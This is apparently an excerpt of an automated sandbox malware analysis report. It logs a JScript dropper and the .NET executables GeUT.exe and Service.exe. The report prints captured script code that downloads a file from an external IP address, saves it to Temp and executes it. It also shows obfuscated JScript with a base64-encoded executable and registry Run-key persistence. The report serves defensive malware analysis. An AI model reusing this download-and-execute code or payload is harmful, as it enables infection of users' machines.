GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");_Stream.Close();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp/OLWJMU.js")
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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
.NET source code contains potential unpacker
Source: GeUT.exe.3.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.4.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_05D817A7 push 14518905h; ret 5_2_05D819B3
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CAC483 push es; iretd 5_2_06CAC484
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB801C push es; retf 5_2_07CB7FDF
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07D14838 push esp; ret 5_2_07D14841
Source: GeUT.exe.3.dr Static PE information: section name: .text entropy: 7.937538668947789
Source: Service.exe.4.dr Static PE information: section name: .text entropy: 7.937538668947789
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\GeUT.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File created: C:\Users\user\AppData\Roaming\Service.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Stores large binary data to the registry
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\497B5ED3636167B0F1E8 436ACE6829F875FEC7CFDC9CAE0283849C6021AF7AE44C96E35989B0FF7E6B20 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
